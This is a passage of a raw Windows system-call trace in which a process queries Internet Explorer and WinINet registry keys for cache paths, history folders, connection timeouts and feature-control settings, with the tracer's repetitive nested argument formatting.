\0D\0a\0t\0a\0\\0M\0i\0c\0r\0o\0s\0o\0f\0t\0\\0F\0e\0e\0d\0s\0 \0C\0a\0c\0h\0e\0\0\0"}, 148, ) , Partial, 148, ... TitleIdx=0, Type=2, Data= (200, "CachePath", Partial, 148, ... TitleIdx=0, Type=2, Data="%\0U\0S\0E\0R\0P\0R\0O\0F\0I\0L\0E\0%\0\\0L\0o\0c\0a\0l\0 \0S\0e\0t\0t\0i\0n\0g\0s\0\\0A\0p\0p\0l\0i\0c\0a\0t\0i\0o\0n\0 \0D\0a\0t\0a\0\\0M\0i\0c\0r\0o\0s\0o\0f\0t\0\\0F\0e\0e\0d\0s\0 \0C\0a\0c\0h\0e\0\0\0"}, 148, ) }, 148, ) == 0x0 02312 896 NtQueryValueKey (200, (200, "CachePrefix", Partial, 144, ... TitleIdx=0, Type=1, Data="f\0e\0e\0d\0p\0l\0a\0t\0:\0\0\0"}, 32, ) , Partial, 144, ... TitleIdx=0, Type=1, Data= (200, "CachePrefix", Partial, 144, ... TitleIdx=0, Type=1, Data="f\0e\0e\0d\0p\0l\0a\0t\0:\0\0\0"}, 32, ) }, 32, ) == 0x0 02313 896 NtQueryValueKey (200, (200, "CachePrefix", Partial, 144, ... TitleIdx=0, Type=1, Data="f\0e\0e\0d\0p\0l\0a\0t\0:\0\0\0"}, 32, ) , Partial, 144, ... TitleIdx=0, Type=1, Data= (200, "CachePrefix", Partial, 144, ... TitleIdx=0, Type=1, Data="f\0e\0e\0d\0p\0l\0a\0t\0:\0\0\0"}, 32, ) }, 32, ) == 0x0 02314 896 NtQueryValueKey (200, (200, "CacheLimit", Partial, 144, ... TitleIdx=0, Type=4, Data="\0 \0\0"}, 16, ) , Partial, 144, ... TitleIdx=0, Type=4, Data= (200, "CacheLimit", Partial, 144, ... TitleIdx=0, Type=4, Data="\0 \0\0"}, 16, ) }, 16, ) == 0x0 02315 896 NtQueryValueKey (200, (200, "CacheOptions", Partial, 144, ... TitleIdx=0, Type=4, Data="\0\0\0\0"}, 16, ) , Partial, 144, ... TitleIdx=0, Type=4, Data= (200, "CacheOptions", Partial, 144, ... TitleIdx=0, Type=4, Data="\0\0\0\0"}, 16, ) }, 16, ) == 0x0 02316 896 NtClose (200, ... ) == 0x0 02317 896 NtEnumerateKey (204, 1, Basic, 288, ... {LastWrite={0x450668aa,0x1c8b090}, TitleIdx=0, Name= (204, 1, Basic, 288, ... {LastWrite={0x450668aa,0x1c8b090}, TitleIdx=0, Name="MSHist012008050720080508"}, 64, ) }, 64, ) == 0x0 02318 896 NtOpenKey (0xf, {24, 204, 0x40, 0, 0, (0xf, {24, 204, 0x40, 0, 0, "MSHist012008050720080508"}, ... 200, ) }, ... 200, ) == 0x0 02319 896 NtQueryValueKey (200, (200, "CacheRepair", Partial, 144, ... TitleIdx=0, Type=4, Data="\0\0\0\0"}, 16, ) , Partial, 144, ... TitleIdx=0, Type=4, Data= (200, "CacheRepair", Partial, 144, ... TitleIdx=0, Type=4, Data="\0\0\0\0"}, 16, ) }, 16, ) == 0x0 02320 896 NtQueryValueKey (200, (200, "CachePath", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_BUFFER_OVERFLOW 02321 896 NtQueryValueKey (200, (200, "CachePath", Partial, 160, ... TitleIdx=0, Type=2, Data="%\0U\0S\0E\0R\0P\0R\0O\0F\0I\0L\0E\0%\0\\0L\0o\0c\0a\0l\0 \0S\0e\0t\0t\0i\0n\0g\0s\0\\0H\0i\0s\0t\0o\0r\0y\0\\0H\0i\0s\0t\0o\0r\0y\0.\0I\0E\05\0\\0M\0S\0H\0i\0s\0t\00\01\02\00\00\08\00\05\00\07\02\00\00\08\00\05\00\08\0\0\0"}, 160, ) , Partial, 160, ... TitleIdx=0, Type=2, Data= (200, "CachePath", Partial, 160, ... TitleIdx=0, Type=2, Data="%\0U\0S\0E\0R\0P\0R\0O\0F\0I\0L\0E\0%\0\\0L\0o\0c\0a\0l\0 \0S\0e\0t\0t\0i\0n\0g\0s\0\\0H\0i\0s\0t\0o\0r\0y\0\\0H\0i\0s\0t\0o\0r\0y\0.\0I\0E\05\0\\0M\0S\0H\0i\0s\0t\00\01\02\00\00\08\00\05\00\07\02\00\00\08\00\05\00\08\0\0\0"}, 160, ) }, 160, ) == 0x0 02322 896 NtQueryValueKey (200, (200, "CachePath", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_BUFFER_OVERFLOW 02323 896 NtQueryValueKey (200, (200, "CachePath", Partial, 160, ... TitleIdx=0, Type=2, Data="%\0U\0S\0E\0R\0P\0R\0O\0F\0I\0L\0E\0%\0\\0L\0o\0c\0a\0l\0 \0S\0e\0t\0t\0i\0n\0g\0s\0\\0H\0i\0s\0t\0o\0r\0y\0\\0H\0i\0s\0t\0o\0r\0y\0.\0I\0E\05\0\\0M\0S\0H\0i\0s\0t\00\01\02\00\00\08\00\05\00\07\02\00\00\08\00\05\00\08\0\0\0"}, 160, ) , Partial, 160, ... TitleIdx=0, Type=2, Data= (200, "CachePath", Partial, 160, ... TitleIdx=0, Type=2, Data="%\0U\0S\0E\0R\0P\0R\0O\0F\0I\0L\0E\0%\0\\0L\0o\0c\0a\0l\0 \0S\0e\0t\0t\0i\0n\0g\0s\0\\0H\0i\0s\0t\0o\0r\0y\0\\0H\0i\0s\0t\0o\0r\0y\0.\0I\0E\05\0\\0M\0S\0H\0i\0s\0t\00\01\02\00\00\08\00\05\00\07\02\00\00\08\00\05\00\08\0\0\0"}, 160, ) }, 160, ) == 0x0 02324 896 NtQueryValueKey (200, (200, "CachePrefix", Partial, 144, ... TitleIdx=0, Type=1, Data=":\02\00\00\08\00\05\00\07\02\00\00\08\00\05\00\08\0:\0 \0\0\0"}, 52, ) , Partial, 144, ... TitleIdx=0, Type=1, Data= (200, "CachePrefix", Partial, 144, ... TitleIdx=0, Type=1, Data=":\02\00\00\08\00\05\00\07\02\00\00\08\00\05\00\08\0:\0 \0\0\0"}, 52, ) }, 52, ) == 0x0 02325 896 NtQueryValueKey (200, (200, "CachePrefix", Partial, 144, ... TitleIdx=0, Type=1, Data=":\02\00\00\08\00\05\00\07\02\00\00\08\00\05\00\08\0:\0 \0\0\0"}, 52, ) , Partial, 144, ... TitleIdx=0, Type=1, Data= (200, "CachePrefix", Partial, 144, ... TitleIdx=0, Type=1, Data=":\02\00\00\08\00\05\00\07\02\00\00\08\00\05\00\08\0:\0 \0\0\0"}, 52, ) }, 52, ) == 0x0 02326 896 NtQueryValueKey (200, (200, "CacheLimit", Partial, 144, ... TitleIdx=0, Type=4, Data="\0 \0\0"}, 16, ) , Partial, 144, ... TitleIdx=0, Type=4, Data= (200, "CacheLimit", Partial, 144, ... TitleIdx=0, Type=4, Data="\0 \0\0"}, 16, ) }, 16, ) == 0x0 02327 896 NtQueryValueKey (200, (200, "CacheOptions", Partial, 144, ... TitleIdx=0, Type=4, Data="\13\0\0\0"}, 16, ) , Partial, 144, ... TitleIdx=0, Type=4, Data= (200, "CacheOptions", Partial, 144, ... TitleIdx=0, Type=4, Data="\13\0\0\0"}, 16, ) }, 16, ) == 0x0 02328 896 NtClose (200, ... ) == 0x0 02329 896 NtEnumerateKey (204, 2, Basic, 288, ... {LastWrite={0x2030327f,0x1c7701e}, TitleIdx=0, Name= (204, 2, Basic, 288, ... {LastWrite={0x2030327f,0x1c7701e}, TitleIdx=0, Name="UserData"}, 32, ) }, 32, ) == 0x0 02330 896 NtOpenKey (0xf, {24, 204, 0x40, 0, 0, (0xf, {24, 204, 0x40, 0, 0, "UserData"}, ... 200, ) }, ... 200, ) == 0x0 02331 896 NtQueryValueKey (200, (200, "CacheRepair", Partial, 144, ... TitleIdx=0, Type=4, Data="\0\0\0\0"}, 16, ) , Partial, 144, ... TitleIdx=0, Type=4, Data= (200, "CacheRepair", Partial, 144, ... TitleIdx=0, Type=4, Data="\0\0\0\0"}, 16, ) }, 16, ) == 0x0 02332 896 NtQueryValueKey (200, (200, "CachePath", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_BUFFER_OVERFLOW 02333 896 NtQueryValueKey (200, (200, "CachePath", Partial, 148, ... TitleIdx=0, Type=2, Data="%\0U\0S\0E\0R\0P\0R\0O\0F\0I\0L\0E\0%\0\\0A\0p\0p\0l\0i\0c\0a\0t\0i\0o\0n\0 \0D\0a\0t\0a\0\\0M\0i\0c\0r\0o\0s\0o\0f\0t\0\\0I\0n\0t\0e\0r\0n\0e\0t\0 \0E\0x\0p\0l\0o\0r\0e\0r\0\\0U\0s\0e\0r\0D\0a\0t\0a\0\0\0"}, 148, ) , Partial, 148, ... TitleIdx=0, Type=2, Data= (200, "CachePath", Partial, 148, ... TitleIdx=0, Type=2, Data="%\0U\0S\0E\0R\0P\0R\0O\0F\0I\0L\0E\0%\0\\0A\0p\0p\0l\0i\0c\0a\0t\0i\0o\0n\0 \0D\0a\0t\0a\0\\0M\0i\0c\0r\0o\0s\0o\0f\0t\0\\0I\0n\0t\0e\0r\0n\0e\0t\0 \0E\0x\0p\0l\0o\0r\0e\0r\0\\0U\0s\0e\0r\0D\0a\0t\0a\0\0\0"}, 148, ) }, 148, ) == 0x0 02334 896 NtQueryValueKey (200, (200, "CachePath", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_BUFFER_OVERFLOW 02335 896 NtQueryValueKey (200, (200, "CachePath", Partial, 148, ... TitleIdx=0, Type=2, Data="%\0U\0S\0E\0R\0P\0R\0O\0F\0I\0L\0E\0%\0\\0A\0p\0p\0l\0i\0c\0a\0t\0i\0o\0n\0 \0D\0a\0t\0a\0\\0M\0i\0c\0r\0o\0s\0o\0f\0t\0\\0I\0n\0t\0e\0r\0n\0e\0t\0 \0E\0x\0p\0l\0o\0r\0e\0r\0\\0U\0s\0e\0r\0D\0a\0t\0a\0\0\0"}, 148, ) , Partial, 148, ... TitleIdx=0, Type=2, Data= (200, "CachePath", Partial, 148, ... TitleIdx=0, Type=2, Data="%\0U\0S\0E\0R\0P\0R\0O\0F\0I\0L\0E\0%\0\\0A\0p\0p\0l\0i\0c\0a\0t\0i\0o\0n\0 \0D\0a\0t\0a\0\\0M\0i\0c\0r\0o\0s\0o\0f\0t\0\\0I\0n\0t\0e\0r\0n\0e\0t\0 \0E\0x\0p\0l\0o\0r\0e\0r\0\\0U\0s\0e\0r\0D\0a\0t\0a\0\0\0"}, 148, ) }, 148, ) == 0x0 02336 896 NtQueryValueKey (200, (200, "CachePrefix", Partial, 144, ... TitleIdx=0, Type=1, Data="U\0s\0e\0r\0D\0a\0t\0a\0\0\0"}, 30, ) , Partial, 144, ... TitleIdx=0, Type=1, Data= (200, "CachePrefix", Partial, 144, ... TitleIdx=0, Type=1, Data="U\0s\0e\0r\0D\0a\0t\0a\0\0\0"}, 30, ) }, 30, ) == 0x0 02337 896 NtQueryValueKey (200, (200, "CachePrefix", Partial, 144, ... TitleIdx=0, Type=1, Data="U\0s\0e\0r\0D\0a\0t\0a\0\0\0"}, 30, ) , Partial, 144, ... TitleIdx=0, Type=1, Data= (200, "CachePrefix", Partial, 144, ... TitleIdx=0, Type=1, Data="U\0s\0e\0r\0D\0a\0t\0a\0\0\0"}, 30, ) }, 30, ) == 0x0 02338 896 NtQueryValueKey (200, (200, "CacheLimit", Partial, 144, ... TitleIdx=0, Type=4, Data="\350\3\0\0"}, 16, ) , Partial, 144, ... TitleIdx=0, Type=4, Data= (200, "CacheLimit", Partial, 144, ... TitleIdx=0, Type=4, Data="\350\3\0\0"}, 16, ) }, 16, ) == 0x0 02339 896 NtQueryValueKey (200, (200, "CacheOptions", Partial, 144, ... TitleIdx=0, Type=4, Data="\10\0\0\0"}, 16, ) , Partial, 144, ... TitleIdx=0, Type=4, Data= (200, "CacheOptions", Partial, 144, ... TitleIdx=0, Type=4, Data="\10\0\0\0"}, 16, ) }, 16, ) == 0x0 02340 896 NtClose (200, ... ) == 0x0 02341 896 NtEnumerateKey (204, 3, Basic, 288, ... ) == STATUS_NO_MORE_ENTRIES 02342 896 NtReleaseMutant (152, ... 0x0, ) == 0x0 02343 896 NtClose (204, ... ) == 0x0 02344 896 NtWaitForSingleObject (156, 0, 0x0, ... ) == 0x0 02345 896 NtReleaseMutant (156, ... 0x0, ) == 0x0 02346 896 NtWaitForSingleObject (156, 0, 0x0, ... ) == 0x0 02347 896 NtReleaseMutant (156, ... 0x0, ) == 0x0 02348 896 NtOpenKey (0x1, {24, 120, 0x40, 0, 0, (0x1, {24, 120, 0x40, 0, 0, "SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 02349 896 NtOpenKey (0x1, {24, 120, 0x40, 0, 0, (0x1, {24, 120, 0x40, 0, 0, "SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 02350 896 NtOpenKey (0x1, {24, 120, 0x40, 0, 0, (0x1, {24, 120, 0x40, 0, 0, "SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 02351 896 NtOpenKey (0x1, {24, 120, 0x40, 0, 0, (0x1, {24, 120, 0x40, 0, 0, "SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 02352 896 NtOpenKey (0x1, {24, 28, 0x40, 0, 0, (0x1, {24, 28, 0x40, 0, 0, "Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 02353 896 NtOpenKey (0x1, {24, 28, 0x40, 0, 0, (0x1, {24, 28, 0x40, 0, 0, "Software\Policies\Microsoft\Internet Explorer\Main\FeatureControl"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 02354 896 NtOpenKey (0x1, {24, 120, 0x40, 0, 0, (0x1, {24, 120, 0x40, 0, 0, "Software\Policies\Microsoft\Internet Explorer\Main\FeatureControl"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 02355 896 NtOpenKey (0x1, {24, 28, 0x40, 0, 0, (0x1, {24, 28, 0x40, 0, 0, "Software\Microsoft\Internet Explorer\Main\FeatureControl"}, ... 204, ) }, ... 204, ) == 0x0 02356 896 NtOpenKey (0x1, {24, 120, 0x40, 0, 0, (0x1, {24, 120, 0x40, 0, 0, "Software\Microsoft\Internet Explorer\Main\FeatureControl"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 02357 896 NtOpenKey (0x1, {24, 204, 0x40, 0, 0, (0x1, {24, 204, 0x40, 0, 0, "RETRY_HEADERONLYPOST_ONCONNECTIONRESET"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 02358 896 NtClose (204, ... ) == 0x0 02359 896 NtOpenKey (0x1, {24, 28, 0x40, 0, 0, (0x1, {24, 28, 0x40, 0, 0, "Software\Policies\Microsoft\Internet Explorer\Main\FeatureControl"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 02360 896 NtOpenKey (0x1, {24, 120, 0x40, 0, 0, (0x1, {24, 120, 0x40, 0, 0, "Software\Policies\Microsoft\Internet Explorer\Main\FeatureControl"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 02361 896 NtOpenKey (0x1, {24, 28, 0x40, 0, 0, (0x1, {24, 28, 0x40, 0, 0, "Software\Microsoft\Internet Explorer\Main\FeatureControl"}, ... 204, ) }, ... 204, ) == 0x0 02362 896 NtOpenKey (0x1, {24, 120, 0x40, 0, 0, (0x1, {24, 120, 0x40, 0, 0, "Software\Microsoft\Internet Explorer\Main\FeatureControl"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 02363 896 NtOpenKey (0x1, {24, 204, 0x40, 0, 0, (0x1, {24, 204, 0x40, 0, 0, "FEATURE_BUFFERBREAKING_818408"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 02364 896 NtClose (204, ... ) == 0x0 02365 896 NtOpenKey (0x1, {24, 28, 0x40, 0, 0, (0x1, {24, 28, 0x40, 0, 0, "Software\Policies\Microsoft\Internet Explorer\Main\FeatureControl"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 02366 896 NtOpenKey (0x1, {24, 120, 0x40, 0, 0, (0x1, {24, 120, 0x40, 0, 0, "Software\Policies\Microsoft\Internet Explorer\Main\FeatureControl"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 02367 896 NtOpenKey (0x1, {24, 28, 0x40, 0, 0, (0x1, {24, 28, 0x40, 0, 0, "Software\Microsoft\Internet Explorer\Main\FeatureControl"}, ... 204, ) }, ... 204, ) == 0x0 02368 896 NtOpenKey (0x1, {24, 120, 0x40, 0, 0, (0x1, {24, 120, 0x40, 0, 0, "Software\Microsoft\Internet Explorer\Main\FeatureControl"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 02369 896 NtOpenKey (0x1, {24, 204, 0x40, 0, 0, (0x1, {24, 204, 0x40, 0, 0, "FEATURE_SKIP_POST_RETRY_ON_INTERNETWRITEFILE_KB895954"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 02370 896 NtClose (204, ... ) == 0x0 02371 896 NtOpenKey (0x1, {24, 120, 0x40, 0, 0, (0x1, {24, 120, 0x40, 0, 0, "SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 02372 896 NtQueryValueKey (52, (52, "DisableWorkerThreadHibernation", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 02373 896 NtOpenKey (0x1, {24, 28, 0x40, 0, 0, (0x1, {24, 28, 0x40, 0, 0, "SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings"}, ... 204, ) }, ... 204, ) == 0x0 02374 896 NtQueryValueKey (204, (204, "DisableWorkerThreadHibernation", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 02375 896 NtClose (204, ... ) == 0x0 02376 896 NtQueryValueKey (52, (52, "DisableReadRange", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 02377 896 NtQueryValueKey (52, (52, "SocketSendBufferLength", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 02378 896 NtQueryValueKey (52, (52, "SocketReceiveBufferLength", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 02379 896 NtQueryValueKey (52, (52, "KeepAliveTimeout", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 02380 896 NtQueryValueKey (52, (52, "MaxHttpRedirects", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 02381 896 NtQueryValueKey (52, (52, "MaxConnectionsPerServer", Partial, 144, ... TitleIdx=0, Type=4, Data="P\0\0\0"}, 16, ) , Partial, 144, ... TitleIdx=0, Type=4, Data= (52, "MaxConnectionsPerServer", Partial, 144, ... TitleIdx=0, Type=4, Data="P\0\0\0"}, 16, ) }, 16, ) == 0x0 02382 896 NtQueryValueKey (52, (52, "MaxConnectionsPer1_0Server", Partial, 144, ... TitleIdx=0, Type=4, Data="P\0\0\0"}, 16, ) , Partial, 144, ... TitleIdx=0, Type=4, Data= (52, "MaxConnectionsPer1_0Server", Partial, 144, ... TitleIdx=0, Type=4, Data="P\0\0\0"}, 16, ) }, 16, ) == 0x0 02383 896 NtQueryValueKey (52, (52, "ServerInfoTimeout", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 02384 896 NtQueryValueKey (52, (52, "ConnectTimeOut", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 02385 896 NtOpenKey (0x1, {24, 28, 0x40, 0, 0, (0x1, {24, 28, 0x40, 0, 0, "SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings"}, ... 204, ) }, ... 204, ) == 0x0 02386 896 NtQueryValueKey (204, (204, "ConnectTimeOut", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 02387 896 NtClose (204, ... ) == 0x0 02388 896 NtQueryValueKey (52, (52, "ConnectRetries", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 02389 896 NtOpenKey (0x1, {24, 28, 0x40, 0, 0, (0x1, {24, 28, 0x40, 0, 0, "SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings"}, ... 204, ) }, ... 204, ) == 0x0 02390 896 NtQueryValueKey (204, (204, "ConnectRetries", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 02391 896 NtClose (204, ... ) == 0x0 02392 896 NtQueryValueKey (52, (52, "SendTimeOut", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 02393 896 NtOpenKey (0x1, {24, 28, 0x40, 0, 0, (0x1, {24, 28, 0x40, 0, 0, "SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings"}, ... 204, ) }, ... 204, ) == 0x0 02394 896 NtQueryValueKey (204, (204, "SendTimeOut", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 02395 896 NtClose (204, ... ) == 0x0 02396 896 NtQueryValueKey (52, (52, "ReceiveTimeOut", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 02397 896 NtOpenKey (0x1, {24, 28, 0x40, 0, 0, (0x1, {24, 28, 0x40, 0, 0, "SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings"}, ... 204, ) }, ... 204, ) == 0x0 02398 896 NtQueryValueKey (204, (204, "ReceiveTimeOut", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 02399 896 NtClose (204, ... ) == 0x0 02400 896 NtQueryValueKey (52, (52, "DisableNTLMPreAuth", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 02401 896 NtQueryValueKey (52, (52, "ScavengeCacheLowerBound", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 02402 896 NtQueryValueKey (52, (52, "CertCacheNoValidate", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 02403 896 NtOpenKey (0x1, {24, 120, 0x40, 0, 0, (0x1, {24, 120, 0x40, 0, 0, "SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache"}, ... 204, ) }, ... 204, ) == 0x0 02404 896 NtQueryValueKey (204, (204, "ScavengeCacheFileLifeTime", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 02405 896 NtClose (204, ... ) == 0x0 02406 896 NtOpenKey (0x1, {24, 28, 0x40, 0, 0, (0x1, {24, 28, 0x40, 0, 0, "SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 02407 896 NtOpenKey (0x1, {24, 28, 0x40, 0, 0, (0x1, {24, 28, 0x40, 0, 0, "SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 02408 896 NtOpenKey (0x1, {24, 120, 0x40, 0, 0, (0x1, {24, 120, 0x40, 0, 0, "SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 02409 896 NtOpenKey (0x1, {24, 28, 0x40, 0, 0, (0x1, {24, 28, 0x40, 0, 0, "SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache"}, ... 204, ) }, ... 204, ) == 0x0 02410 896 NtOpenKey (0x1, {24, 120, 0x40, 0, 0, (0x1, {24, 120, 0x40, 0, 0, "SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache"}, ... 200, ) }, ... 200, ) == 0x0 02411 896 NtQueryValueKey (200, (200, "ScavengeCacheFileLimit", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 02412 896 NtQueryValueKey (204, (204, "ScavengeCacheFileLimit", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 02413 896 NtClose (204, ... ) == 0x0 02414 896 NtClose (200, ... ) == 0x0 02415 896 NtOpenKey (0x1, {24, 28, 0x40, 0, 0, (0x1, {24, 28, 0x40, 0, 0, "Software\Policies\Microsoft\Internet Explorer\Main\FeatureControl"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 02416 896 NtOpenKey (0x1, {24, 120, 0x40, 0, 0, (0x1, {24, 120, 0x40, 0, 0, "Software\Policies\Microsoft\Internet Explorer\Main\FeatureControl"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 02417 896 NtOpenKey (0x1, {24, 28, 0x40, 0, 0, (0x1, {24, 28, 0x40, 0, 0, "Software\Microsoft\Internet Explorer\Main\FeatureControl"}, ... 200, ) }, ... 200, ) == 0x0 02418 896 NtOpenKey (0x1, {24, 120, 0x40, 0, 0, (0x1, {24, 120, 0x40, 0, 0, "Software\Microsoft\Internet Explorer\Main\FeatureControl"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 02419 896 NtOpenKey (0x1, {24, 200, 0x40, 0, 0, (0x1, {24, 200, 0x40, 0, 0, "FEATURE_FIX_CHUNKED_PROXY_SCRIPT_DOWNLOAD_KB843289"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 02420 896 NtClose (200, ... ) == 0x0 02421 896 NtOpenKey (0x1, {24, 28, 0x40, 0, 0, (0x1, {24, 28, 0x40, 0, 0, "Software\Policies\Microsoft\Internet Explorer\Main\FeatureControl"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 02422 896 NtOpenKey (0x1, {24, 120, 0x40, 0, 0, (0x1, {24, 120, 0x40, 0, 0, "Software\Policies\Microsoft\Internet Explorer\Main\FeatureControl"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 02423 896 NtOpenKey (0x1, {24, 28, 0x40, 0, 0, (0x1, {24, 28, 0x40, 0, 0, "Software\Microsoft\Internet Explorer\Main\FeatureControl"}, ... 200, ) }, ... 200, ) == 0x0 02424 896 NtOpenKey (0x1, {24, 120, 0x40, 0, 0, (0x1, {24, 120, 0x40, 0, 0, "Software\Microsoft\Internet Explorer\Main\FeatureControl"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 02425 896 NtOpenKey (0x1, {24, 200, 0x40, 0, 0, (0x1, {24, 200, 0x40, 0, 0, "FEATURE_USE_CNAME_FOR_SPN_KB911149"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 02426 896 NtClose (200, ... ) == 0x0 02427 896 NtQueryValueKey (52, (52, "HttpDefaultExpiryTimeSecs", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 02428 896 NtQueryValueKey (52, (52, "FtpDefaultExpiryTimeSecs", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 02429 896 NtOpenKey (0x1, {24, 28, 0x40, 0, 0, (0x1, {24, 28, 0x40, 0, 0, "Software\Policies\Microsoft\Internet Explorer\Main\FeatureControl"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 02430 896 NtOpenKey (0x1, {24, 120, 0x40, 0, 0, (0x1, {24, 120, 0x40, 0, 0, "Software\Policies\Microsoft\Internet Explorer\Main\FeatureControl"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 02431 896 NtOpenKey (0x1, {24, 28, 0x40, 0, 0, (0x1, {24, 28, 0x40, 0, 0, "Software\Microsoft\Internet Explorer\Main\FeatureControl"}, ... 200, ) }, ... 200, ) == 0x0 02432 896 NtOpenKey (0x1, {24, 120, 0x40, 0, 0, (0x1, {24, 120, 0x40, 0, 0, "Software\Microsoft\Internet Explorer\Main\FeatureControl"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 02433 896 NtOpenKey (0x1, {24, 200, 0x40, 0, 0, (0x1, {24, 200, 0x40, 0, 0, "FEATURE_PERMIT_CACHE_FOR_AUTHENTICATED_FTP_KB910274"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 02434 896 NtClose (200, ... ) == 0x0 02435 896 NtOpenKey (0x1, {24, 28, 0x40, 0, 0, (0x1, {24, 28, 0x40, 0, 0, "Software\Policies\Microsoft\Internet Explorer\Main\FeatureControl"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 02436 896 NtOpenKey (0x1, {24, 120, 0x40, 0, 0, (0x1, {24, 120, 0x40, 0, 0, "Software\Policies\Microsoft\Internet Explorer\Main\FeatureControl"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 02437 896 NtOpenKey (0x1, {24, 28, 0x40, 0, 0, (0x1, {24, 28, 0x40, 0, 0, "Software\Microsoft\Internet Explorer\Main\FeatureControl"}, ... 200, ) }, ... 200, ) == 0x0 02438 896 NtOpenKey (0x1, {24, 120, 0x40, 0, 0, (0x1, {24, 